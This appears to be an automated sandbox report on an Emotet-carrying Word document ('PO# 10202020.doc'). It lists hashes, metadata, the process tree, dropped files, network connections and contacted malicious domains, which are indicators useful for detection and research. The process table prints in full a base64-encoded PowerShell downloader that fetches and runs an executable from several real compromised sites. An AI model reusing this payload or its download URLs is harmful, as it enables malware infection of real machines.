File name: | PO# 10202020.doc |
Full analysis: | https://app.any.run/tasks/685b903f-1740-4cfa-8826-3605673db78d |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 03:05:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Voluptatem., Author: Zoe Lacroix, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 19 23:56:00 2020, Last Saved Time/Date: Mon Oct 19 23:56:00 2020, Number of Pages: 1, Number of Words: 2182, Number of Characters: 12441, Security: 8 |
MD5: | 2EFF7536474058E7618AB5412A6D4AA0 |
SHA1: | 1F209782ECA4BC45D81D941209661EA25AE03C3E |
SHA256: | 95B98FAF2F2B61CBBC67B3A74804114372F608A947809D4DEE22642261B87A52 |
SSDEEP: | 3072:6JivKie6B/w2yiWydwjxBft2LGRo0z5v9Sd+l4PJhERTM5/oKUQ2t17RR39V:6JiP/w2PwxBft2LG60z5v9Sd+l4PJhEn |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Voluptatem. |
---|---|
Subject: | - |
Author: | Zoe Lacroix |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:10:19 22:56:00 |
ModifyDate: | 2020:10:19 22:56:00 |
Pages: | 1 |
Words: | 2182 |
Characters: | 12441 |
Security: | Locked for annotations |
Company: | - |
Lines: | 103 |
Paragraphs: | 29 |
CharCountWithSpaces: | 14594 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PO# 10202020.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3492 | POwersheLL -ENCOD JABEAFAAOQAxACAAIAA9AFsAdAB5AHAARQBdACgAJwBzAHkAcwBUAGUAbQAuAEkAJwArACcAbwAuAEQASQByAGUAJwArACcAYwB0ACcAKwAnAG8AJwArACcAcgBZACcAKQA7ACAAIABzAEUAdAAtAGkAVABlAE0AIAAgAFYAYQBSAEkAQQBiAGwARQA6AEcANwAwACAAKAAgAFsAdABZAHAARQBdACgAJwBTAFkAcwAnACsAJwB0AGUATQAuAE4AJwArACcAZQBUAC4AcwBlAFIAVgBJAEMAJwArACcAZQBQACcAKwAnAG8ASQAnACsAJwBuAFQAbQBhACcAKwAnAG4AQQBHACcAKwAnAGUAJwArACcAUgAnACkAKQA7ACAAIAAgAFMARQBUACAAKAAiAEgAIgArACIAYgBKAGMATAA2ACIAKQAgACAAKAAgAFsAVAB5AFAAZQBdACgAJwBTAFkAUwBUACcAKwAnAGUAbQAuAE4AJwArACcARQAnACsAJwBUAC4AcwBlACcAKwAnAGMAJwArACcAdQBSAGkAVAB5AFAAcgBPAHQAbwAnACsAJwBDAE8AJwArACcATAB0AFkAUABFACcAKQApACAAOwAgACAAJABKADQAaQA0AHEAaQA1AD0AKAAnAE0AJwArACcAZwBkAGMAaABvAHoAJwApADsAJABFADUAMQBzAGQANAB2AD0AJABOADAAcwA0AGkAOABwACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQATQBrAGYAaQBmAGsAbQA7ACQASAB2AGUAbAB1ADQAcAA9ACgAJwBVAHMAcAAnACsAJwB2AHUAcQBmACcAKQA7ACAAKAAgAFYAQQByAGkAQQBiAGwAZQAgAGQAcAA5ADEAIAAtAHYAQQBsAHUAIAAgACkAOgA6AEMAUgBFAGEAdABlAEQASQBSAGUAYwB0AE8AcgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB4AHQAOAAnACsAJwBBAHcAdgA4ADMAeAB0AHgAdAA4ACcAKwAnAFUAJwArACcAMwBmADYAaQBvAHQAeAAnACsAJwB0ADgAJwApACAALQBjAHIAZQBwAGwAQQBDAEUAIAAnAHgAdAA4ACcALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADMAbQBqADgAMgA3AD0AKAAnAEoANQBsACcAKwAnAGcAZAB2ADkAJwApADsAIAAgACgAIAAgAGMAaABpAEwAZABJAFQARQBNACAAIAB2AGEAcgBpAEEAQgBMAGUAOgBHADcAMAAgACAAKQAuAFYAQQBMAHUARQA6ADoAUwBFAEMAdQByAGkAdABZAFAAcgBPAFQAbwBjAE8AbAAgAD0AIAAgACgAIAB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBoACIAKwAiAEIAagBDAEwANgAiACkAIAAtAFYAQQBMAHUARQBvACAAKQA6ADoAVABsAHMAMQAyADsAJABWAGwANAB3AGoAbgA1AD0AKAAnAE8AJwArACcAMQBhADIAJwArACcAcwA1ADcAJwApADsAJABCAGEAeAA5AGEAbABmACAAPQAgACgAJwBEADIAZQBuADAAJwArACcAZAAnACkAOwAkAE8AMQB5ADkAMgBzAGoAPQAoACcARgAnACsAJwB1AGoAJwArACcAMgBpAHkAdAAnACkAOwAkAFQAMAB4AHoAaAAxAGYAPQAoACcATwA5AGoAYQBtACcAKwAnAHIAdQAnACkAOwAkAEUAZAA1AHMAcAA1ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACcAQQB3AHYAOAAzACcAKwAnAHgAdAAnACsAJwB7ADAAfQAnACsAJwBVADMAZgA2ACcAKwAnAGkAbwB0ACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBmAFsAQwBIAGEAUgBdADkAMgApACsAJABCAGEAeAA5AGEAbABmACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABUAHAAagA4AHcAcQBkAD0AKAAnAEgAYQA0ACcAKwAnAGcAaQBkAHgAJwApADsAJABHAHkAdQBtADkAYwA4AD0ATgBlAGAAdwBgAC0ATwBiAGAAagBlAEMAVAAgAG4ARQB0AC4AVwBFAEIAQwBsAGkARQBuAHQAOwAkAFkAZwAwAGwANABkAGYAPQAoACcAaAB0AHQAJwArACcAcAAnACsAJwBzADoALwAnACsAJwAvAGEAJwArACcAcgBpAGYAJwArACcAdQBsAGgAdQBxACcAKwAnAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAALQAnACsAJwBpAG4AJwArACcAYwBsAHUAZABlAHMALwB1AGMAVgAnACsAJwA4ACcAKwAnAC8AKgAnACsAJwBoAHQAdABwAHMAOgAvAC8AdABoACcAKwAnAGUAJwArACcAdQAnACsAJwBzAG0AYQBuAHMAYQAnACsAJwBpAGYALgBjAG8AbQAvACcAKwAnAHcAJwArACcAcAAvACcAKwAnAGUAVgBpAG4AJwArACcAYwAnACsAJwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzACcAKwAnADoALwAvAGcAcgBlAGUAJwArACcAbgBsAGEAbgBkACcAKwAnAGwAJwArACcAaQAnACsAJwBvAG4AJwArACcALgAnACsAJwBjAG8AbQAvAHcAcAAtAGMAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQALwAnACsAJwBDAC8AKgBoAHQAJwArACcAdABwACcAKwAnAHMAJwArACcAOgAvACcAKwAnAC8AdwAnACsAJwBlAGIAYwBsAGkAZQAnACsAJwBuAHQAJwArACcAdwAnACsAJwBvACcAKwAnAHIAawBzACcAKwAnAC4AJwArACcAeAB5AHoALwBmAGwAJwArACcAbwAnACsAJwByAGkAZAAnACsAJwBhAC8AdQA3AGEASgAvACcAKwAnACoAJwArACcAaAB0AHQAJwArACcAcAAnACsAJwBzADoALwAnACsAJwAvAGgAZAAuAHkAYQBtAGEAJwArACcAcgBpAG4AawBvAHUAJwArACcALgBqAHAALwBiAGwAbwBnAHMALwAnACsAJwA5ACcAKwAnADcAdwBTAHcARgBiAC8AKgBoAHQAdABwADoALwAnACsAJwAvAGwAZQBnACcAKwAnAGEAbAAnACsAJwBlAG0AJwArACcAcABvAHcAZQByACcAKwAnAG0AZQBuAHQAJwArACcAaQBuACcAKwAnAGQAaQAnACsAJwBhACcAKwAnAC4AYwBvAG0ALwAnACsAJwBjAGcAJwArACcAaQAnACsAJwAtAGIAaQAnACsAJwBuAC8AJwArACcAOQBaADYATAAnACsAJwAvACoAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6AC8ALwAnACsAJwBkAGgAYQAnACsAJwByAGEAbQAnACsAJwBwAGEAbAAuAG4AZQB0ACcAKwAnAC8AcABhACcAKwAnAHIAZQAnACsAJwBuAHQALwBMACcAKwAnAE4AbgBiAEIALwAqACcAKwAnAGgAdAB0AHAAcwA6AC8AJwArACcALwB6AGkAaQBsAC4AZQB1ACcAKwAnAC8AYwBnAGkALQBiACcAKwAnAGkAJwArACcAbgAvACcAKwAnAEoATgB6AEkAJwArACcALwAnACkALgBTAFAAbABpAHQAKAAkAFAAdwBvAHAAbABvAHkAIAArACAAJABFADUAMQBzAGQANAB2ACAAKwAgACQATwAxAG8ANABpAGkAbQApADsAJABaAGIAMAA0AG8AdwB0AD0AKAAnAFcAcABvAGgAJwArACcAOQAnACsAJwAwADIAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABLAHcAMwBrADcAOAA3ACAAaQBuACAAJABZAGcAMABsADQAZABmACkAewB0AHIAeQB7ACQARwB5AHUAbQA5AGMAOAAuAGQATwBXAG4ATABvAEEARABGAEkAbABlACgAJABLAHcAMwBrADcAOAA3ACwAIAAkAEUAZAA1AHMAcAA1ADUAKQA7ACQASAA3AHAAMQBjAGYAOAA9ACgAJwBUAHEAbgA3AGMAJwArACcAawBhACcAKQA7AEkAZgAgACgAKABHAEUAVAAtAGAASQBUAGAAZQBNACAAJABFAGQANQBzAHAANQA1ACkALgBsAGUAbgBHAFQAaAAgAC0AZwBlACAAMgA0ADgAMQAyACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAnAG4AJwArACcAMwAnACsAJwAyAF8AUAByACcAKwAnAG8AYwBlAHMAcwAnACkAKQAuAEMAcgBlAGEAVABFACgAJABFAGQANQBzAHAANQA1ACkAOwAkAEIAaABoAGUANQBfAF8APQAoACcAQwB2ADgAXwByADgAJwArACcAdwAnACkAOwBiAHIAZQBhAGsAOwAkAFkAcwBtADUAdwB5ADYAPQAoACcAUABiACcAKwAnADAAagB4AGkAdgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAdAA2ADMAdQBsAHEAPQAoACcASwB4ACcAKwAnAF8AJwArACcAdgBfAG8AawAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3088 | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3120 | "C:\Users\admin\AppData\Local\WFS\wpcao.exe" | C:\Users\admin\AppData\Local\WFS\wpcao.exe | D2en0d.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5AE6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PR8YI57SOSFGW7YCDJ3A.temp | — | |
MD5:— | SHA256:— | |||
3492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F00CFA0FC62A12DA8A033BE3ABA2EF8E | SHA256:1619D99CBBB6C376255F2C67BAC847B352A25C6964FDEEFA70C58CBB1E9790B3 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:5E0B022F755530A9F50828D736CC9FE7 | SHA256:1F67F157E187EAAD5BD5B8C80E4B5290B92D14D4A12DD6E98A4436E7E7CE958A | |||
3492 | POwersheLL.exe | C:\Users\admin\Awv83xt\U3f6iot\D2en0d.exe | html | |
MD5:E0EBA4960A5C222BF2D022F1A1F54E5E | SHA256:8AC20CBAEB52173B92338D79D4533B1362D26DE0F5DFF0B977F47DAD4BAAC919 | |||
3492 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1666ae.TMP | binary | |
MD5:B8D28A0751A092388652CF6B1F64DABE | SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$# 10202020.doc | pgc | |
MD5:948AD51A2ED54E11AC069BB8EEE770D5 | SHA256:7294A3A9E80E07EA46D8F11D21C68256FC651EB47B3B2D5372B243032C8E4C6A | |||
3088 | D2en0d.exe | C:\Users\admin\AppData\Local\WFS\wpcao.exe | executable | |
MD5:C9C10AE87ED8B75D020D4B7767A73BD1 | SHA256:5AFC0966AE64144BE5AB45148C6F0C737B60A337DCE75D1590196F96E9B39DE9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3492 | POwersheLL.exe | GET | — | 202.66.172.245:80 | http://legalempowermentindia.com/cgi-bin/9Z6L/ | IN | — | — | suspicious |
3120 | wpcao.exe | POST | 200 | 24.230.141.169:80 | http://24.230.141.169/FsGpGwodDOGyip2/ERrT4qltQVGRrJ7/ | US | binary | 132 b | malicious |
3492 | POwersheLL.exe | GET | 403 | 69.12.87.2:80 | http://dharampal.net/parent/LNnbB/ | US | html | 380 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 94.130.88.157:443 | arifulhuq.com | Hetzner Online GmbH | DE | unknown |
3492 | POwersheLL.exe | 198.37.123.126:443 | theusmansaif.com | DC74 LLC | US | malicious |
3492 | POwersheLL.exe | 94.130.88.157:443 | arifulhuq.com | Hetzner Online GmbH | DE | unknown |
3492 | POwersheLL.exe | 202.66.172.245:80 | legalempowermentindia.com | ZNet Cloud Services | IN | suspicious |
3492 | POwersheLL.exe | 148.72.118.97:443 | webclientworks.xyz | — | US | unknown |
3492 | POwersheLL.exe | 104.31.76.228:443 | greenlandlion.com | Cloudflare Inc | US | shared |
3492 | POwersheLL.exe | 163.43.94.66:443 | hd.yamarinkou.jp | SAKURA Internet Inc. | JP | unknown |
3492 | POwersheLL.exe | 69.12.87.2:80 | dharampal.net | QuadraNet, Inc | US | unknown |
3492 | POwersheLL.exe | 185.7.252.116:443 | ziil.eu | Elkdata OU | EE | unknown |
3120 | wpcao.exe | 24.230.141.169:80 | — | Midcontinent Communications | US | malicious |
Domain | IP | Reputation |
---|---|---|
arifulhuq.com |
| suspicious |
theusmansaif.com |
| malicious |
greenlandlion.com |
| unknown |
webclientworks.xyz |
| unknown |
hd.yamarinkou.jp |
| unknown |
legalempowermentindia.com |
| suspicious |
dharampal.net |
| unknown |
ziil.eu |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3120 | wpcao.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |